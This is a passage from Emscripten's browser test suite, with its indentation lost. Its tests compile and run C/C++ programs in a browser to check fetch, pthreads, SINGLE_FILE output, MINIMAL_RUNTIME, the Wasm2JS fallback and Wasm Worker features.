'-sGL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-sGL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest_exit('webgl2_simple_enable_extensions.c', args=cmd)
@requires_graphics_hardware
def test_webgpu_basic_rendering(self):
for args in [[], ['-sASSERTIONS', '--closure=1'], ['-sMAIN_MODULE=1']]:
self.btest_exit('webgpu_basic_rendering.cpp', args=['-sUSE_WEBGPU'] + args)
def test_webgpu_get_device(self):
for args in [['-sASSERTIONS', '--closure=1']]:
self.btest_exit('webgpu_get_device.cpp', args=['-sUSE_WEBGPU'] + args)
# Tests the feature that shell html page can preallocate the typed array and place it
# to Module.buffer before loading the script page.
# In this build mode, the -sINITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', args=['-sWASM=0', '-sINITIAL_MEMORY=16MB', '-sABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
@also_with_wasm2js
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest_exit('fetch/to_memory.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '-DFILE_DOES_NOT_EXIST'])
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(test_file('gears.png'), 'gears.png')
for arg in [[], ['-sFETCH_SUPPORT_INDEXEDDB=0']]:
self.btest_exit('fetch/to_memory.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'] + arg)
@parameterized({
'': ([],),
'pthread_exit': (['-DDO_PTHREAD_EXIT'],),
})
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_from_thread(self, args):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/from_thread.cpp',
args=args + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sFETCH_DEBUG', '-sFETCH', '-DFILE_DOES_NOT_EXIST'],
also_wasm2js=True)
@also_with_wasm2js
def test_fetch_to_indexdb(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/to_indexeddb.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
@also_with_wasm2js
def test_fetch_cached_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/cached_xhr.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests that response headers get set on emscripten_fetch_t values.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@also_with_wasm2js
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/response_headers.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
@also_with_wasm2js
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest_exit('fetch/stream_file.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '-sINITIAL_MEMORY=536870912'])
def test_fetch_headers_received(self):
self.btest_exit('fetch/headers_received.cpp', args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -sPROXY_TO_PTHREAD option.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/example_synchronous_fetch.c', args=['-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/example_synchronous_fetch.c', args=['-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@also_with_wasm2js
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '--proxy-to-worker'])
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@unittest.skip("emscripten_fetch_wait relies on an asm.js-based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_fetch_in_main_thread.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sWASM=0', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
@disabled('https://github.com/emscripten-core/emscripten/issues/16746')
def test_fetch_idb_store(self):
self.btest_exit('fetch/idb_store.cpp', args=['-sUSE_PTHREADS', '-sFETCH', '-sWASM=0', '-sPROXY_TO_PTHREAD'])
@requires_threads
@disabled('https://github.com/emscripten-core/emscripten/issues/16746')
def test_fetch_idb_delete(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/idb_delete.cpp', args=['-sUSE_PTHREADS', '-sFETCH_DEBUG', '-sFETCH', '-sWASM=0', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_locale(self):
self.emcc_args.append('-I' + path_from_root('system/lib/libc/musl/src/internal'))
self.emcc_args.append('-I' + path_from_root('system/lib/pthread'))
for args in [
[],
['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest_exit('pthread/test_pthread_locale.c', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and
# emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest_exit('emscripten_set_canvas_element_size.c')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main
# thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
self.btest_exit('emscripten_get_device_pixel_ratio.c', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
self.btest_exit(test_file('pthread/test_pthread_run_script.cpp'), args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sOFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-sGL_DEBUG', '--threadprofiler', '-sASSERTIONS'] + args
print(' '.join(cmd))
self.btest_exit('canvas_animate_resize.cpp', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@parameterized({
'': ([],),
'O3': (['-O3'],)
})
@requires_threads
def test_pthread_hello_thread(self, opts):
for modularize in [[], ['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest_exit(test_file('pthread/hello_thread.c'), args=['-sUSE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -sMINIMAL_RUNTIME works well in different build modes
@parameterized({
'': ([],),
'modularize': (['-sMODULARIZE', '-sEXPORT_NAME=MyModule'],),
'O3': (['-O3'],),
'O3_modularize': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule'],),
'O3_modularize_MINIMAL_RUNTIME_2': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule', '-sMINIMAL_RUNTIME=2'],),
})
def test_minimal_runtime_hello_thread(self, opts):
self.btest_exit(test_file('pthread/hello_thread.c'), args=['--closure=1', '-sMINIMAL_RUNTIME', '-sUSE_PTHREADS'] + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest_exit(test_file('pthread/test_pthread_memory_growth_mainthread.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=32MB', '-sMAXIMUM_MEMORY=256MB'] + emcc_args, also_wasm2js=False)
run()
run(['-sPROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest_exit(test_file('pthread/test_pthread_memory_growth.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=32MB', '-sMAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_wasm2js=False)
run()
run(['-sASSERTIONS'])
run(['-sPROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest_exit(test_file('pthread/test_pthread_reltime.cpp'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.set_setting('EXIT_RUNTIME')
self.compile_btest([test_file('pthread/hello_thread.c'), '-sUSE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'], reporting=Reporting.JS_ONLY)
shutil.copyfile(test_file('pthread/main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?exit:0')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-sEXIT_RUNTIME', '-sMODULARIZE', '-sEXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-sSINGLE_FILE'])
create_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-sSINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-sMINIMAL_RUNTIME', '-sSINGLE_FILE', '-sWASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest_exit('minimal_hello.c', args=['-sSINGLE_FILE', '-sENVIRONMENT=web', '-O2', '--closure=1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-sSINGLE_FILE']
if not wasm_enabled:
args += ['-sWASM=0']
self.compile_btest(args)
create_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-sSINGLE_FILE'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.set_setting('EXIT_RUNTIME')
self.compile_btest([test_file('pthread/test_pthread_atomics.cpp'), '-o', 'test.js', '-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'], reporting=Reporting.JS_ONLY)
create_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?exit:0')
def test_access_file_after_heap_resize(self):
create_file('test.txt', 'hello from file')
self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-sALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt'])
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-sALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-sFORCE_FILESYSTEM'])
def test_unicode_html_shell(self):
create_file('main.cpp', r'''
int main() {
return 0;
}
''')
create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.btest_exit('main.cpp', args=['--shell-file', 'shell.html'])
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest_exit(test_file('pthread/emscripten_thread_sleep.c'), args=['-sUSE_PTHREADS', '-sEXPORTED_RUNTIME_METHODS=[print]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', Path('subdir/test.js'))
shutil.move('test.wasm', Path('subdir/test.wasm'))
src = read_file('test.html')
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-sMODULARIZE`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-sMODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', Path('subdir/test.js'))
shutil.move('test.wasm', Path('subdir/test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-sMODULARIZE'], 'Module();'),
(['subdir'], ['-sMODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', Path(filesystem_path, 'test.js'))
shutil.move('test.wasm', Path(filesystem_path, 'test.wasm'))
create_file(Path(filesystem_path, 'test.html'), '''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest_exit(test_file('emscripten_request_animation_frame.c'))
def test_emscripten_request_animation_frame_loop(self):
self.btest_exit(test_file('emscripten_request_animation_frame_loop.c'))
def test_request_animation_frame(self):
self.btest_exit('request_animation_frame.cpp', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest_exit(test_file('emscripten_set_timeout.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest_exit(test_file('emscripten_set_timeout_loop.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest_exit(test_file('emscripten_set_immediate.c'))
def test_emscripten_set_immediate_loop(self):
self.btest_exit(test_file('emscripten_set_immediate_loop.c'))
@requires_threads
def test_emscripten_set_interval(self):
self.btest_exit(test_file('emscripten_set_interval.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(test_file('emscripten_performance_now.c'), '0', args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest_exit(test_file('embind/test_pthreads.cpp'), args=['--bind', '-pthread', '-sPTHREAD_POOL_SIZE=2'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-sASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest_exit(test_file('emscripten_console_log.c'), args=['--pre-js', test_file('emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -sENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest_exit('minimal_hello.c', args=['-sENVIRONMENT=web', '-O3', '--closure=1'])
# Tests that Closure run in combination with -sENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-sENVIRONMENT=web', '-O3', '--closure=1'])
def test_no_declare_asm_module_exports_asmjs(self):
# TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0
self.ldflags.remove('-sCLOSURE_WARNINGS=error')
for minimal_runtime in [[], ['-sMINIMAL_RUNTIME']]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-sDECLARE_ASM_MODULE_EXPORTS=0', '-sENVIRONMENT=web', '-O3', '--closure=1', '-sWASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
for mode in [1, 2]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-sDECLARE_ASM_MODULE_EXPORTS=0', '-sENVIRONMENT=web', '-O3', '--closure=1', f'-sMINIMAL_RUNTIME={mode}'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-sMINIMAL_RUNTIME=2']
for wasm in [[], ['-sWASM=0', '--memory-init-file', '0'], ['-sWASM=0', '--memory-init-file', '1'], ['-sSINGLE_FILE'], ['-sWASM=0', '-sSINGLE_FILE']]:
for modularize in [[], ['-sMODULARIZE']]:
print(str(args + wasm + modularize))
self.btest_exit('minimal_hello.c', args=args + wasm + modularize)
# Tests that -sMINIMAL_RUNTIME works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [
[],
['-sMINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'],
['-sMINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure=1']
]:
self.btest_exit(test_file('small_hello_world.c'), args=args + ['-sMINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
self.btest_exit(test_file('browser/test_offset_converter.c'), assert_returncode=1, args=['-sUSE_OFFSET_CONVERTER', '-gsource-map', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS'])
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest_exit(test_file('test_emscripten_unwind_to_js_event_loop.c'))
def test_wasm2js_fallback(self):
self.set_setting('EXIT_RUNTIME')
for args in [[], ['-sMINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-sWASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
html = read_file('test.html')
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
create_file('test.html', html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
self.set_setting('EXIT_RUNTIME')
for args in [[], ['-sMINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-sWASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
# Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
def test_system(self):
self.btest_exit(test_file('system.c'))
# Tests the hello_wasm_worker.c documentation example code.
@also_with_minimal_runtime
def test_wasm_worker_hello(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
def test_wasm_worker_hello_minimal_runtime_2(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS', '-sMINIMAL_RUNTIME=2'])
# Tests Wasm Workers build in Wasm2JS mode.
@also_with_minimal_runtime
def test_wasm_worker_hello_wasm2js(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS', '-sWASM=0'])
# Tests the WASM_WORKERS=2 build mode, which embeds the Wasm Worker bootstrap JS script file to the main JS file.
@also_with_minimal_runtime
def test_wasm_worker_embedded(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS=2'])
# Tests Wasm Worker thread stack setup
@also_with_minimal_runtime
def test_wasm_worker_thread_stack(self):
for mode in [0, 1, 2]:
self.btest(test_file('wasm_worker/thread_stack.c'), expected='0', args=['-sWASM_WORKERS', f'-sSTACK_OVERFLOW_CHECK={mode}'])
# Tests emscripten_malloc_wasm_worker() and emscripten_current_thread_is_wasm_worker() functions
@also_with_minimal_runtime
def test_wasm_worker_malloc(self):
self.btest(test_file('wasm_worker/malloc_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests Wasm Worker+pthreads simultaneously
@also_with_minimal_runtime
def test_wasm_worker_and_pthreads(self):
self.btest(test_file('wasm_worker/wasm_worker_and_pthread.c'), expected='0', args=['-sWASM_WORKERS', '-pthread'])
# Tests emscripten_wasm_worker_self_id() function
@also_with_minimal_runtime
def test_wasm_worker_self_id(self):
self.btest(test_file('wasm_worker/wasm_worker_self_id.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests direct Wasm Assembly .S file based TLS variables in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_tls_wasm_assembly(self):
self.btest(test_file('wasm_worker/wasm_worker_tls_wasm_assembly.c'),
expected='42', args=['-sWASM_WORKERS', test_file('wasm_worker/wasm_worker_tls_wasm_assembly.S')])
# Tests C++11 keyword thread_local for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_cpp11_thread_local(self):
self.btest(test_file('wasm_worker/cpp11_thread_local.cpp'), expected='42', args=['-sWASM_WORKERS'])
# Tests C11 keyword _Thread_local for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_c11__Thread_local(self):
self.btest(test_file('wasm_worker/c11__Thread_local.c'), expected='42', args=['-sWASM_WORKERS', '-std=gnu11']) # Cannot test C11 - because of EM_ASM must test Gnu11.
# Tests GCC specific extension keyword __thread for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_gcc___thread(self):
self.btest(test_file('wasm_worker/gcc___Thread.c'), expected='42', args=['-sWASM_WORKERS', '-std=gnu11'])
# Tests emscripten_wasm_worker_sleep()
@also_with_minimal_runtime
def test_wasm_worker_sleep(self):
self.btest(test_file('wasm_worker/wasm_worker_sleep.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_terminate_wasm_worker()
@also_with_minimal_runtime
def test_wasm_worker_terminate(self):
self.btest(test_file('wasm_worker/terminate_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_terminate_all_wasm_workers()
@also_with_minimal_runtime
def test_wasm_worker_terminate_all(self):
self.btest(test_file('wasm_worker/terminate_all_wasm_workers.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_worker_post_function_*() API
@also_with_minimal_runtime
def test_wasm_worker_post_function(self):
self.btest(test_file('wasm_worker/post_function.c'), expected='8', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_worker_post_function_*() API and EMSCRIPTEN_WASM_WORKER_ID_PARENT
# to send a message back from Worker to its parent thread.
@also_with_minimal_runtime
def test_wasm_worker_post_function_to_main_thread(self):
self.btest(test_file('wasm_worker/post_function_to_main_thread.c'), expected='10', args=['-sWASM_WORKERS'])
# Tests emscripten_navigator_hardware_concurrency() and emscripten_atomics_is_lock_free()
@also_with_minimal_runtime
def test_wasm_worker_hardware_concurrency_is_lock_free(self):
self.btest(test_file('wasm_worker/hardware_concurrency_is_lock_free.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_wait_i32() and emscripten_wasm_notify() functions.
@also_with_minimal_runtime
def test_wasm_worker_wait32_notify(self):
self.btest(test_file('wasm_worker/wait32_notify.c'), expected='2', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_wait_i64() and emscripten_wasm_notify() functions.
@also_with_minimal_runtime
def test_wasm_worker_wait64_notify(self):
self.btest(test_file('wasm_worker/wait64_notify.c'), expected='2', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_wait_async() function.
@also_with_minimal_runtime
def test_wasm_worker_wait_async(self):
self.btest(test_file('wasm_worker/wait_async.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_wait_async() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_wait_async(self):
self.btest(test_file('wasm_worker/cancel_wait_async.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_all_wait_asyncs() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_all_wait_asyncs(self):
